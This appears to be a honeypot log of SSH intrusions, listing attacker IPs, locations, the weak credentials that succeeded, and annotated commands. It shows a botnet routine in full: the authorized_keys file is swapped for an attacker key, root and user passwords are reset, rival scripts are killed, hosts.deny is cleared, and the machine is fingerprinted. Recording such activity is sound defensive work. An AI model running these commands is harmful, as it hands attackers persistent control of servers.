$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "carol\nlqTGyR09OHGQ\nlqTGyR09OHGQ"|passwd|bash
$ echo "carol\nlqTGyR09OHGQ\nlqTGyR09OHGQ\n"|passwd
🎭 carnival_root_3 (187.51.208.158) β€” Rio de Janeiro, Brazil Β· 3 sessions Β· 59 cmds
2026-05-05 18:53 EDT Β· as root/admin2020, sdtdserver/123, systemd/Voidsetdownload.so
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "Voidsetdownload.so\nmqjm0dnpNpqA\nmqjm0dnpNpqA"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "Voidsetdownload.so\nmqjm0dnpNpqA\nmqjm0dnpNpqA\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:GyAx2kJ9EOcv"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "123\n6ItF63YfBYPg\n6ItF63YfBYPg"|passwd|bash
$ echo "123\n6ItF63YfBYPg\n6ItF63YfBYPg\n"|passwd
🎭 lantern_root_21 (106.13.183.241) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-27 06:03 EDT Β· as root/admin2020
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:NjxIEeUvlEtf"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 kiwi_root (158.178.141.16) β€” Sydney, Australia Β· 2 sessions Β· 39 cmds
2026-05-18 11:00 EDT Β· as root/conrad, systemd/Voidsetdownload.so
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "Voidsetdownload.so\nEnagO08PMu86\nEnagO08PMu86"|passwd|bash
$ Enter new UNIX password:
$ echo "Voidsetdownload.so\nEnagO08PMu86\nEnagO08PMu86\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:6zqB2hQoF31w"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 capoeira_root_8 (129.121.54.208) β€” Vinhedo, Brazil Β· 5 sessions Β· 99 cmds
2026-05-24 08:00 EDT Β· as deploy/admin@123, root/00998877, systemd/Voidsetdownload.so
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—5 // CPU profiling
$ echo -e "uap\nIpjncueHJ72X\nIpjncueHJ72X"|passwd|bash
$ Enter new UNIX password: Γ—4
$ echo "uap\nIpjncueHJ72X\nIpjncueHJ72X\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—5 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—5
$ ls -lh $(which ls) Γ—5
$ which ls Γ—5
$ crontab -l Γ—5 // persistence setup
$ w Γ—5 // logged-in users check
$ uname -m Γ—5
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—5 // CPU profiling
$ top Γ—5 // process monitoring
$ uname Γ—5 // OS identification
$ uname -a Γ—5 // OS/kernel identification
$ whoami Γ—5 // privilege check
$ lscpu | grep Model Γ—5
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—5
$ echo -e "Voidsetdownload.so\n7cB1UFqmY50I\n7cB1UFqmY50I"|passwd|bash
$ echo "Voidsetdownload.so\n7cB1UFqmY50I\n7cB1UFqmY50I\n"|passwd
$ echo "root:r8dLtfZjlN6b"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "admin@123\nswAO7UxnIjuX\nswAO7UxnIjuX"|passwd|bash
$ echo "admin@123\nswAO7UxnIjuX\nswAO7UxnIjuX\n"|passwd
$ echo -e "123123123\nQF5mJOSckz5b\nQF5mJOSckz5b"|passwd|bash
$ echo "123123123\nQF5mJOSckz5b\nQF5mJOSckz5b\n"|passwd
🎭 bibimbap_root_10 (125.138.175.113) β€” Cheonan, South Korea Β· 2 sessions Β· 40 cmds
2026-05-27 05:00 EDT Β· as systemd/Voidsetdownload.so, uap/uap
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "Voidsetdownload.so\nraUQNsNT8gb2\nraUQNsNT8gb2"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "Voidsetdownload.so\nraUQNsNT8gb2\nraUQNsNT8gb2\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "uap\nlaY02PVjbk62\nlaY02PVjbk62"|passwd|bash
$ echo "uap\nlaY02PVjbk62\nlaY02PVjbk62\n"|passwd
🎭 rogue_root_60 (150.241.88.100) β€” Helsinki, Finland Β· 1 session Β· 19 cmds
2026-05-27 04:26 EDT Β· as root/Qwe@123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:JoUgeONACEbV"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 hanbok_root_9 (43.133.65.220) β€” Seoul, South Korea Β· 2 sessions Β· 4 cmds
2026-05-27 02:51 EDT Β· as sambauser/123456, systemd/Voidsetdownload.so
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 acai_root_5 (191.6.25.239) β€” Presidente Dutra, Brazil Β· 1 session Β· 2 cmds
2026-05-27 02:44 EDT Β· as systemd/Voidsetdownload.so
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 chai_root_3 (103.24.63.85) β€” Mumbai, India Β· 1 session Β· 1 cmd
2026-05-27 02:17 EDT Β· as git/git
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 eagle_root_28 (202.70.78.237) β€” Los Angeles, United States Β· 1 session Β· 2 cmds
2026-05-27 01:22 EDT Β· as root/Abc@123456
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 cipher_root_51 (101.79.165.133) β€” Singapore, Singapore Β· 2 sessions Β· 4 cmds
2026-05-27 00:02 EDT Β· as ubuntu/123456789, ubuntu/redhat@123
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 scone_root_5 (92.207.4.157) β€” Southampton, United Kingdom Β· 2 sessions Β· 4 cmds
2026-05-27 00:05 EDT Β· as ubuntu/123456789, ubuntu/redhat@123
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 liberty_root_21 (172.172.131.149) β€” Boydton, United States Β· 1 session Β· 2 cmds
2026-05-26 23:56 EDT Β· as ubuntu/123456789
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 spice_root_8 (139.59.83.32) β€” Bengaluru, India Β· 2 sessions Β· 4 cmds
2026-05-26 20:26 EDT Β· as jenkins/jenkins123, pentaho/pentaho
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 rogue_root_61 (103.231.14.54) β€” San Po Kong, Hong Kong Β· 2 sessions Β· 4 cmds
2026-05-26 20:30 EDT Β· as jenkins/jenkins123, pentaho/pentaho
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 cowboy_root_31 (160.119.69.14) β€” Los Angeles, United States Β· 2 sessions Β· 4 cmds
2026-05-26 20:27 EDT Β· as jenkins/jenkins123, pentaho/pentaho
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 jade_root_12 (27.128.240.75) β€” Shijiazhuang, China Β· 1 session Β· 2 cmds
2026-05-26 20:20 EDT Β· as ubuntu/fjbdfdjkdsfs541544AA@@
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 cosmo_root_4 (217.150.47.21) β€” Moscow, Russia Β· 4 sessions Β· 80 cmds
2026-05-26 19:28 EDT Β· as anand/anand, devops/devops@2025, osadmin/osadmin
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "devops@2025\nK2K6Y6PvzmXm\nK2K6Y6PvzmXm"|passwd|bash
$ Enter new UNIX password: Γ—4
$ echo "devops@2025\nK2K6Y6PvzmXm\nK2K6Y6PvzmXm\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "osadmin\njcizK69K5iwp\njcizK69K5iwp"|passwd|bash
$ echo "osadmin\njcizK69K5iwp\njcizK69K5iwp\n"|passwd
$ echo -e "fjbdfdjkdsfs541544AA@@\nAg7QkktUo0KG\nAg7QkktUo0KG"|passwd|bash
$ echo "fjbdfdjkdsfs541544AA@@\nAg7QkktUo0KG\nAg7QkktUo0KG\n"|passwd
$ echo -e "anand\nCJK2F6ogQNw5\nCJK2F6ogQNw5"|passwd|bash
$ echo "anand\nCJK2F6ogQNw5\nCJK2F6ogQNw5\n"|passwd
🎭 seoul_root_14 (118.35.127.66) β€” Dong-gu, South Korea Β· 2 sessions Β· 39 cmds
